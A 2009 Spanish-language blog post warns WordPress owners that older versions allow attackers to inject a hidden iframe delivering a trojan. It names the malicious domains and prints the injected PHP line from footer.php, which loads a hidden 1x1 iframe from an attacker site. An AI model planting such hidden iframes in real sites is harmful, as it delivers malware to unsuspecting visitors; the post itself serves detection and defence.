Geek the Planet


Seguridad no image

Published on Junio 24th, 2009 | by Angelfire

1

Vulnerabilidad en WordPress permite inyectar iframe con troyano

Ya lo decia yo hace un par de dias, no debemos apresurarnos a actualizar nuestra versión de WordPress, nosotros no somos testers ni mucho menos expertos en seguridad, habia comentado sobre algunos problemas que habian surgido en la nueva versión, pero sin lugar a dudas este es el más peligroso conocido hasta el momento, por desgracia las versiones afectadas son las inferiores a la 2.8 de WordPress, así que potencialmente la gran mayoria de usuarios están en peligro.

El problema, que parece ser un fallo de las versiones desactualizadas de WordPress, ha hecho que varios sitios se vean afectados por este problema. Basicamente esta vulnerabilidad lo que permite es que personas malintencionadas puedan inyectar código HTML, más específicamente un iframe, donde vendría el troyano, las webs invocadas desde el iframe son: brugeni.net y homenameworld.cn.

McAfee Site Advisor ha puesto la actualización rápidamente de algunos blogs hispanos que se han visto afectados con el problema.

Desde MarlexSystems nos hacen una muy buena recomendación, es revisar nuestro sitio web en McAfee Site Advisor (Ver el informe de un sitio) o revisar el  código fuente en la función get_footer() que se encuentra en el archivo footer.php de tu theme WordPress.

El código que pueden encontrar es algo más o menos así:

<?php get_footer();
echo “<iframe src=\”http://brugeni.net/?click=8D7810\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
?>

Esto me pone en tela de juicio, porque ahora es más que necesario hacer una actualización de nuestro WordPress, la seguridad en la mayoria de los casos prima sobre otros problemas, así que no lo piensen dos veces.

Leer Más: Galachadas

Tags: , , , ,


About the Author

Systems Engineering, Computer Systems Specialist, Social Engineering Specialist. Social Media Analyzer. Usability and SEO enthusiasm (Este es mi perfil de Twitter...)



One Response to Vulnerabilidad en WordPress permite inyectar iframe con troyano

  1. Pingback: Nueva vulnerabilidad que permite inyectar un iframe con troyano | TodoWordPress

Back to Top ↑
  • Comentarios recientes

  • Miniposts

    • iOS 8 disponible para descargar

      Hoy se anunció de manera oficial iOS 8, la fecha de llegada será el próximo 17 de septiembre. En iPhonehacks han recopilado los enlaces de descarga directo para los diferentes dispositivos que soportan la nueva versión del sistema operativo. Así que para quienes no desean esperar, ya pueden acceder a la versión Golden Master ...

    • Festigame Colombia 2014

      El festival de videojuegos, cultura gamer y entretenimiento familiar más grande de América Latina ha llegado a nuestro país. Festigame que es un evento creado en Chile en 2012, se ha convertido en el evento anual donde las marcas más importantes de la industria presentan sus últimos productos en el ...

    • Peter Griffin también tiene cuenta en Instagram

      El protagonista de la serie de humor, Padre de Familia, Peter Griffin ha inaugurado su presencia en la red social de fotografía con divertidas fotografías de su vida, y a pesar de ser un personaje de ficción ya ha superado los 200.000 seguidores en tan sólo dos semanas. Son unas fotos bastante divertidas, las ...

    • Manual y documentación de Node.js para Android

      Node.js se ha venido haciendo bastante popular en los últimos años, cada vez son más los usos que como desarrolladores web le damos a esta tecnología. La siguiente aplicación es el manual y la documentación de Node.js, que contiene los siguientes temas: About these Docs Synopsis Assertion Testing Buffer C/C++ Addons Child Processes Cluster Console Crypto Debugger DNS Domain Events File System Globals HTTP HTTPS Modules Net OS Path Process Punycode Query Strings Readline REPL Stream String Decoder Timers TLS/SSL TTY UDP/Datagram URL Utilities VM ZLIB

    • Star Wars Traceroute

      ¿Qué pasa cuando un ingeniero está muy desocupado? pues pasan cosas como esta: Mac y Linux Van a la consola y escriben: traceroute 216.81.59.173 Windows Buscan el CMD y escriben: tracert 216.81.59.173 El resultado es interesante y sorprendente. Si quieren ver la salida de la ejecución del comando, pueden ver el gist Ver más: Beagle Network

  • Comunicados - Notas de Prensa